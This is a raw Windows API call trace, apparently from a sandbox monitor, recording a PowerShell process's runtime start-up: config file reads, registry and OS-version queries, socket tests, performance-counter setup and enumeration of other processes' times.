	[0876.311] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c75dac0 | out: lpFileInformation=0x1c75dac0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0886.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c75d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0886.274] SetErrorMode (uMode=0x1) returned 0x1
	[0886.274] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x37c
	[0886.274] GetFileType (hFile=0x37c) returned 0x1
	[0886.274] SetErrorMode (uMode=0x1) returned 0x1
	[0886.274] GetFileType (hFile=0x37c) returned 0x1
	[0886.277] GetFileSize (in: hFile=0x37c, lpFileSizeHigh=0x1c75dab8 | out: lpFileSizeHigh=0x1c75dab8*=0x0) returned 0x622a
	[0887.410] ReadFile (in: hFile=0x37c, lpBuffer=0x2ec1200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c75d9d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec1200*, lpNumberOfBytesRead=0x1c75d9d8*=0x1000, lpOverlapped=0x0) returned 1
	[0888.472] ReadFile (in: hFile=0x37c, lpBuffer=0x2ec1200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c75d508, lpOverlapped=0x0 | out: lpBuffer=0x2ec1200*, lpNumberOfBytesRead=0x1c75d508*=0x1000, lpOverlapped=0x0) returned 1
	[0888.473] ReadFile (in: hFile=0x37c, lpBuffer=0x2ec1200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c75d508, lpOverlapped=0x0 | out: lpBuffer=0x2ec1200*, lpNumberOfBytesRead=0x1c75d508*=0x1000, lpOverlapped=0x0) returned 1
	[0888.473] ReadFile (in: hFile=0x37c, lpBuffer=0x2ec1200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c75d508, lpOverlapped=0x0 | out: lpBuffer=0x2ec1200*, lpNumberOfBytesRead=0x1c75d508*=0x1000, lpOverlapped=0x0) returned 1
	[0888.473] ReadFile (in: hFile=0x37c, lpBuffer=0x2ec1200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c75d508, lpOverlapped=0x0 | out: lpBuffer=0x2ec1200*, lpNumberOfBytesRead=0x1c75d508*=0x1000, lpOverlapped=0x0) returned 1
	[0888.480] ReadFile (in: hFile=0x37c, lpBuffer=0x2ec1200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c75d648, lpOverlapped=0x0 | out: lpBuffer=0x2ec1200*, lpNumberOfBytesRead=0x1c75d648*=0x1000, lpOverlapped=0x0) returned 1
	[0888.480] ReadFile (in: hFile=0x37c, lpBuffer=0x2ec1200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c75d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2ec1200*, lpNumberOfBytesRead=0x1c75d4c8*=0x22a, lpOverlapped=0x0) returned 1
	[0889.377] ReadFile (in: hFile=0x37c, lpBuffer=0x2ec1200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c75d568, lpOverlapped=0x0 | out: lpBuffer=0x2ec1200*, lpNumberOfBytesRead=0x1c75d568*=0x0, lpOverlapped=0x0) returned 1
	[0890.342] CloseHandle (hObject=0x37c) returned 1
	[0897.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c75da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0897.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c75d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0897.130] CoTaskMemAlloc (cb=0x20c) returned 0x1b73ab10
	[0897.130] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b73ab10, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0897.130] CoTaskMemFree (pv=0x1b73ab10) 
	[0897.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c75daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0897.130] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.130] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75dcc8 | out: TokenHandle=0x1c75dcc8*=0x3b0) returned 1
	[0897.131] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.131] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75dcc8 | out: TokenHandle=0x1c75dcc8*=0x37c) returned 1
	[0897.133] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.133] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75da68 | out: TokenHandle=0x1c75da68*=0x378) returned 1
	[0897.134] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c75db10 | out: lpFileInformation=0x1c75db10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0897.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c75d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0897.136] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c75dac0 | out: lpFileInformation=0x1c75dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0897.137] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.137] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75dcc8 | out: TokenHandle=0x1c75dcc8*=0x3b4) returned 1
	[0897.137] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.137] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75dcc8 | out: TokenHandle=0x1c75dcc8*=0x3b8) returned 1
	[0897.162] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.162] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75d948 | out: TokenHandle=0x1c75d948*=0x35c) returned 1
	[0897.808] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.808] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75d948 | out: TokenHandle=0x1c75d948*=0x384) returned 1
	[0898.575] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388
	[0898.575] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c
	[0898.589] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.589] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75d918 | out: TokenHandle=0x1c75d918*=0x390) returned 1
	[0898.596] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.596] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75d918 | out: TokenHandle=0x1c75d918*=0x394) returned 1
	[0898.609] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.609] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75d858 | out: TokenHandle=0x1c75d858*=0x398) returned 1
	[0899.288] GetCurrentProcess () returned 0xffffffffffffffff
	[0899.288] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75d858 | out: TokenHandle=0x1c75d858*=0x39c) returned 1
	[0899.289] GetCurrentProcess () returned 0xffffffffffffffff
	[0899.289] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75de98 | out: TokenHandle=0x1c75de98*=0x3a0) returned 1
	[0899.300] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c75bf58 | out: phkResult=0x1c75bf58*=0x3c4) returned 0x0
	[0899.301] RegQueryValueExW (in: hKey=0x3c4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c75bedc, lpData=0x0, lpcbData=0x1c75bed8*=0x0 | out: lpType=0x1c75bedc*=0x1, lpData=0x0, lpcbData=0x1c75bed8*=0xe) returned 0x0
	[0899.301] CoTaskMemAlloc (cb=0x12) returned 0x1b778860
	[0899.301] RegQueryValueExW (in: hKey=0x3c4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c75beac, lpData=0x1b778860, lpcbData=0x1c75bea8*=0xe | out: lpType=0x1c75beac*=0x1, lpData="Client", lpcbData=0x1c75bea8*=0xe) returned 0x0
	[0899.301] CoTaskMemFree (pv=0x1b778860) 
	[0899.301] RegCloseKey (hKey=0x3c4) returned 0x0
	[0899.312] CoTaskMemAlloc (cb=0xcd0) returned 0x1b78ffb0
	[0899.313] RasEnumConnectionsW (in: param_1=0x1b78ffb0, param_2=0x1c75deec, param_3=0x1c75dee8 | out: param_1=0x1b78ffb0, param_2=0x1c75deec, param_3=0x1c75dee8) returned 0x0
	[0900.034] CoTaskMemFree (pv=0x1b78ffb0) 
	[0900.041] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c75dcf8 | out: lpWSAData=0x1c75dcf8) returned 0
	[0900.053] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x410
	[0900.059] setsockopt (s=0x410, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0900.059] closesocket (s=0x410) returned 0
	[0900.059] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x410
	[0900.061] setsockopt (s=0x410, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0900.061] closesocket (s=0x410) returned 0
	[0900.067] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.067] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75d578 | out: TokenHandle=0x1c75d578*=0x410) returned 1
	[0900.775] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.775] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75d578 | out: TokenHandle=0x1c75d578*=0x414) returned 1
	[0900.799] GetCurrentProcessId () returned 0x14f0
	[0901.220] CoTaskMemAlloc (cb=0x204) returned 0x2e2700
	[0901.220] GetComputerNameW (in: lpBuffer=0x2e2700, nSize=0x2df0c00 | out: lpBuffer="XDUWTFONO", nSize=0x2df0c00) returned 1
	[0901.220] CoTaskMemFree (pv=0x2e2700) 
	[0901.222] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c75da58 | out: phkResult=0x1c75da58*=0x418) returned 0x0
	[0901.222] RegQueryValueExW (in: hKey=0x418, lpValueName="Library", lpReserved=0x0, lpType=0x1c75d9dc, lpData=0x0, lpcbData=0x1c75d9d8*=0x0 | out: lpType=0x1c75d9dc*=0x1, lpData=0x0, lpcbData=0x1c75d9d8*=0x1c) returned 0x0
	[0901.222] CoTaskMemAlloc (cb=0x20) returned 0x1b7744b0
	[0901.222] RegQueryValueExW (in: hKey=0x418, lpValueName="Library", lpReserved=0x0, lpType=0x1c75d9ac, lpData=0x1b7744b0, lpcbData=0x1c75d9a8*=0x1c | out: lpType=0x1c75d9ac*=0x1, lpData="netfxperf.dll", lpcbData=0x1c75d9a8*=0x1c) returned 0x0
	[0901.222] CoTaskMemFree (pv=0x1b7744b0) 
	[0901.222] RegQueryValueExW (in: hKey=0x418, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c75d9dc, lpData=0x0, lpcbData=0x1c75d9d8*=0x0 | out: lpType=0x1c75d9dc*=0x4, lpData=0x0, lpcbData=0x1c75d9d8*=0x4) returned 0x0
	[0901.223] RegQueryValueExW (in: hKey=0x418, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c75d9e0, lpData=0x1c75d9dc, lpcbData=0x1c75d9d8*=0x4 | out: lpType=0x1c75d9e0*=0x4, lpData=0x1c75d9dc*=0x1, lpcbData=0x1c75d9d8*=0x4) returned 0x0
	[0901.223] RegQueryValueExW (in: hKey=0x418, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c75d9dc, lpData=0x0, lpcbData=0x1c75d9d8*=0x0 | out: lpType=0x1c75d9dc*=0x4, lpData=0x0, lpcbData=0x1c75d9d8*=0x4) returned 0x0
	[0901.223] RegQueryValueExW (in: hKey=0x418, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c75d9e0, lpData=0x1c75d9dc, lpcbData=0x1c75d9d8*=0x4 | out: lpType=0x1c75d9e0*=0x4, lpData=0x1c75d9dc*=0x137a, lpcbData=0x1c75d9d8*=0x4) returned 0x0
	[0901.223] RegCloseKey (hKey=0x418) returned 0x0
	[0901.226] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c75da18 | out: phkResult=0x1c75da18*=0x418) returned 0x0
	[0901.226] RegQueryValueExW (in: hKey=0x418, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c75d99c, lpData=0x0, lpcbData=0x1c75d998*=0x0 | out: lpType=0x1c75d99c*=0x4, lpData=0x0, lpcbData=0x1c75d998*=0x4) returned 0x0
	[0901.226] RegQueryValueExW (in: hKey=0x418, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c75d9a0, lpData=0x1c75d99c, lpcbData=0x1c75d998*=0x4 | out: lpType=0x1c75d9a0*=0x4, lpData=0x1c75d99c*=0x3, lpcbData=0x1c75d998*=0x4) returned 0x0
	[0901.226] RegQueryValueExW (in: hKey=0x418, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c75d99c, lpData=0x0, lpcbData=0x1c75d998*=0x0 | out: lpType=0x1c75d99c*=0x4, lpData=0x0, lpcbData=0x1c75d998*=0x4) returned 0x0
	[0901.226] RegQueryValueExW (in: hKey=0x418, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c75d9a0, lpData=0x1c75d99c, lpcbData=0x1c75d998*=0x4 | out: lpType=0x1c75d9a0*=0x4, lpData=0x1c75d99c*=0x20000, lpcbData=0x1c75d998*=0x4) returned 0x0
	[0901.226] RegQueryValueExW (in: hKey=0x418, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c75d99c, lpData=0x0, lpcbData=0x1c75d998*=0x0 | out: lpType=0x1c75d99c*=0x3, lpData=0x0, lpcbData=0x1c75d998*=0xaa) returned 0x0
	[0901.226] RegQueryValueExW (in: hKey=0x418, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c75d99c, lpData=0x2df3ef0, lpcbData=0x1c75d998*=0xaa | out: lpType=0x1c75d99c*=0x3, lpData=0x2df3ef0*, lpcbData=0x1c75d998*=0xaa) returned 0x0
	[0901.231] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0901.235] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c75d950, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0901.236] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x420
	[0901.239] MapViewOfFile (hFileMappingObject=0x420, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2380000
	[0901.240] VirtualQuery (in: lpAddress=0x2380000, lpBuffer=0x1c75d948, dwLength=0x30 | out: lpBuffer=0x1c75d948*(BaseAddress=0x2380000, AllocationBase=0x2380000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0901.240] LocalFree (hMem=0x1b77b8b0) returned 0x0
	[0901.240] RegCloseKey (hKey=0x418) returned 0x0
	[0901.243] GetVersionExW (in: lpVersionInformation=0x1c75c920*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c75c920*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0901.244] GetVersionExW (in: lpVersionInformation=0x1c75c8f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c75c8f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0901.245] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2df4bc0, cbSid=0x1c75d930 | out: pSid=0x2df4bc0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c75d930) returned 1
	[0901.248] CreateMutexW (lpMutexAttributes=0x2df4dc8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.249] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x418
	[0901.253] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x1f4) returned 0x0
	[0901.254] GetCurrentProcessId () returned 0x14f0
	[0901.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14f0) returned 0x424
	[0901.256] GetProcessTimes (in: hProcess=0x424, lpCreationTime=0x1c75d840, lpExitTime=0x1c75d838, lpKernelTime=0x1c75d830, lpUserTime=0x1c75d828 | out: lpCreationTime=0x1c75d840, lpExitTime=0x1c75d838, lpKernelTime=0x1c75d830, lpUserTime=0x1c75d828) returned 1
	[0901.256] CloseHandle (hObject=0x424) returned 1
	[0901.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf2c) returned 0x424
	[0901.257] GetProcessTimes (in: hProcess=0x424, lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8 | out: lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8) returned 1
	[0901.257] CloseHandle (hObject=0x424) returned 1
	[0901.257] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf2c) returned 0x424
	[0901.258] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.258] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.259] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x424, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c75d828, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c75d828*=0x428) returned 1
	[0901.260] CloseHandle (hObject=0x428) returned 1
	[0901.261] CloseHandle (hObject=0x424) returned 1
	[0901.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9b8) returned 0x424
	[0901.261] GetProcessTimes (in: hProcess=0x424, lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8 | out: lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8) returned 1
	[0901.261] CloseHandle (hObject=0x424) returned 1
	[0901.261] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x9b8) returned 0x424
	[0901.261] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.261] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.261] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x424, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c75d828, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c75d828*=0x428) returned 1
	[0901.262] CloseHandle (hObject=0x428) returned 1
	[0901.621] CloseHandle (hObject=0x424) returned 1
	[0901.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcb0) returned 0x424
	[0901.621] GetProcessTimes (in: hProcess=0x424, lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8 | out: lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8) returned 1
	[0901.621] CloseHandle (hObject=0x424) returned 1
	[0901.621] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xcb0) returned 0x424
	[0901.621] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.621] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.621] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x424, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c75d828, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c75d828*=0x428) returned 1
	[0901.622] CloseHandle (hObject=0x428) returned 1
	[0901.622] CloseHandle (hObject=0x424) returned 1
	[0901.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf10) returned 0x424
	[0901.622] GetProcessTimes (in: hProcess=0x424, lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8 | out: lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8) returned 1
	[0901.622] CloseHandle (hObject=0x424) returned 1
	[0901.622] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf10) returned 0x424
	[0901.622] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.622] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.623] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x424, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c75d828, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c75d828*=0x428) returned 1
	[0901.623] CloseHandle (hObject=0x428) returned 1
	[0901.623] CloseHandle (hObject=0x424) returned 1
	[0901.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf18) returned 0x424
	[0901.623] GetProcessTimes (in: hProcess=0x424, lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8 | out: lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8) returned 1
	[0901.623] CloseHandle (hObject=0x424) returned 1
	[0901.623] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf18) returned 0x424
	[0901.623] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.623] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.624] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x424, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c75d828, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c75d828*=0x428) returned 1
	[0901.624] CloseHandle (hObject=0x428) returned 1
	[0901.624] CloseHandle (hObject=0x424) returned 1
	[0901.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf64) returned 0x424
	[0901.624] GetProcessTimes (in: hProcess=0x424, lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8 | out: lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8) returned 1
	[0901.624] CloseHandle (hObject=0x424) returned 1
	[0901.624] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf64) returned 0x424
	[0901.624] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.624] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.625] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x424, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c75d828, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c75d828*=0x428) returned 1
	[0901.625] CloseHandle (hObject=0x428) returned 1
	[0901.625] CloseHandle (hObject=0x424) returned 1
	[0901.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf38) returned 0x424
	[0901.625] GetProcessTimes (in: hProcess=0x424, lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8 | out: lpCreationTime=0x1c75d8d0, lpExitTime=0x1c75d8c8, lpKernelTime=0x1c75d8c0, lpUserTime=0x1c75d8b8) returned 1
	[0901.625] CloseHandle (hObject=0x424) returned 1
	[0901.625] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf38) returned 0x424
	[0901.625] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.626] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.626] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x424, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c75d828, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c75d828*=0x428) returned 1
	[0901.626] CloseHandle (hObject=0x428) returned 1
	[0901.626] CloseHandle (hObject=0x424) returned 1
	[0901.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf6c) returned 0x424
